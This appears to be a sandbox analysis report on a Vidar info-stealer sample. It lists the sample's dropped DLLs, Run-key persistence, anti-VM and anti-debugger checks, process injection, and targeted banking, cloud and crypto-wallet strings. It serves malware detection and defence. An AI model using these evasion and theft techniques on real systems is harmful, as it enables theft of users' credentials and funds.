Drops PE files to the application program directory (C:\ProgramData)

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AttoDesignerEditor			Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AttoDesignerEditor			Jump to behavior

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe

2_2_00938ADE

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: 0.2.7ZthFNAqYp.exe.27e0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.7ZthFNAqYp.exe.27e0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.7ZthFNAqYp.exe.833b9e.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.7ZthFNAqYp.exe.920000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.7ZthFNAqYp.exe.920000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.7ZthFNAqYp.exe.833b9e.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.7ZthFNAqYp.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2332683863.00000000027E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2331724187.0000000000833000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 7ZthFNAqYp.exe PID: 3536, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 7ZthFNAqYp.exe PID: 6484, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: 7ZthFNAqYp.exe	Binary or memory string: DIR_WATCH.DLL
Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: INMPM20IXQUGN9:-?5(\C!7%{->^WALLET_PATHSOFTWARE\MONERO-PROJECT\MONERO-CORE.KEYS\MONERO\WALLET.KEYS\\\.\\...\\\\\\\\\\\\HAL9THJOHNDOEDISPLAYAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL20:41:3120:41:3120:41:3120:41:3120:41:3120:41:31DELAYS.TMP%S%SNTDLL.DLL
Source: 7ZthFNAqYp.exe	Binary or memory string: SBIEDLL.DLL
Source: 7ZthFNAqYp.exe	Binary or memory string: API_LOG.DLL

Contains functionality to detect sandboxes (mouse cursor move detection)

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe

Code function: OpenInputDesktop,SetThreadDesktop,GetCursorPos,GetCursorPos,Sleep,Sleep,GetCursorPos,Sleep,Sleep,GetCursorPos,

2_2_0092180D

Found dropped PE file which has not been started or loaded

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Dropped PE file which has not been started: C:\Users\user\Music\AttoDesignerUpdater\AttoConvertVideo.exe	Jump to dropped file
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

Found large amount of non-executed APIs

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe

API coverage: 6.5 %

Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe

Code function: 2_2_00930DB0 GetKeyboardLayoutList followed by cmp: cmp eax, ebx and CTI: jbe 00930EC3h

2_2_00930DB0

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_00936013 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	2_2_00936013
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_00929CF1 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	2_2_00929CF1
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_0093547D wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	2_2_0093547D
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_0092D59B FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	2_2_0092D59B
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_00921D80 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	2_2_00921D80
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_0092B5B4 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	2_2_0092B5B4
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_00934D08 wsprintfA,FindFirstFileA,_memset,_memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcatA,strtok_s,strtok_s,_memset,lstrcatA,strtok_s,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,strtok_s,FindNextFileA,FindClose,	2_2_00934D08
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_0092BF22 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,	2_2_0092BF22
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_0092B914 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	2_2_0092B914
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_00935B4D GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,	2_2_00935B4D
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_0092CD0C wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	2_2_0092CD0C

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe

Code function: 2_2_00935182 GetLogicalDriveStringsA,_memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,

2_2_00935182

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe

Code function: 2_2_00930F8F GetSystemInfo,wsprintfA,

2_2_00930F8F

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior

Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696487552\|UE
Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696487552f
Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001115000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001088000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.00000000010B7000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001058000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.00000000010B7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696487552
Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696487552o
Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696487552
Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696487552j
Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001058000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696487552s
Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: 7ZthFNAqYp.exe, 00000002.00000003.3125474284.00000000011E7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	API call chain: ExitProcess graph end node

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe

Process information queried: ProcessInformation

Jump to behavior

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe

Code function: 2_2_0093D1A8 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

2_2_0093D1A8

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe

2_2_00938ADE

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_009214AD mov eax, dword ptr fs:[00000030h]	2_2_009214AD
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_0092148A mov eax, dword ptr fs:[00000030h]	2_2_0092148A
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_009214A2 mov eax, dword ptr fs:[00000030h]	2_2_009214A2
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_00938726 mov eax, dword ptr fs:[00000030h]	2_2_00938726
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_00938725 mov eax, dword ptr fs:[00000030h]	2_2_00938725

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe

Code function: 2_2_009310EE GetProcessHeap,HeapAlloc,GlobalMemoryStatusEx,wsprintfA,

2_2_009310EE

Launches processes in debugging mode, may be used to hinder debugging

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe

Process created: C:\Users\user\Desktop\7ZthFNAqYp.exe "C:\Users\user\Desktop\7ZthFNAqYp.exe"

Jump to behavior

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_0093D1A8 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_0093D1A8
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_0093DB1C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_0093DB1C
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_009477BE SetUnhandledExceptionFilter,	2_2_009477BE
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CB8AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_6CB8AC62

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: Process Memory Space: 7ZthFNAqYp.exe PID: 3536, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 7ZthFNAqYp.exe PID: 6484, type: MEMORYSTR

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe

2_2_0092F51F

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe

Memory written: C:\Users\user\Desktop\7ZthFNAqYp.exe base: 920000 value starts with: 4D5A

Jump to behavior

Searches for specific processes (likely to inject)

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_0093247D __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,		2_2_0093247D
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_00932554 __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,		2_2_00932554

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe

2_2_6CBD4760

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe

2_2_6CAB1C30

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe

Code function: 2_2_0092119E cpuid

2_2_0092119E

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,	2_2_00930DB0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: GetLocaleInfoA,	2_2_0094E834
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	2_2_0094B25C
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen,	2_2_0094B3F8
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,	2_2_00949BE0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,	2_2_0094B351
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,	2_2_0094ACD0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,	2_2_0094B453
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,	2_2_00945573
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,	2_2_00949EFE
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: GetLocaleInfoA,_LocaleUpdate::_LocaleUpdate,___ascii_strnicmp,__tolower_l,__tolower_l,	2_2_0094E6FF
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: EnumSystemLocalesA,	2_2_0094B6E6
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,	2_2_0094B624
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,	2_2_0094762C
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,	2_2_0094B7B3
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,	2_2_0094B710
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	2_2_00947706
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	2_2_00948F54
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,	2_2_0094B777

Queries information about the installed CPU (vendor, model number etc)

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe

Code function: 0_2_005E43A3 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_005E43A3

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe

Code function: 2_2_00930C28 GetProcessHeap,HeapAlloc,GetUserNameA,

2_2_00930C28

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe

Code function: 2_2_00930D03 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,

2_2_00930D03

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe

Code function: 2_2_6CAD8390 NSS_GetVersion,

2_2_6CAD8390

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

AV process strings found (often used to terminate AV products)

Source: 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001115000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.00000000010B7000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001058000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001115000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dows Defender\MsMpeng.exe

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

Stealing of Sensitive Information

Yara detected Vidar

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
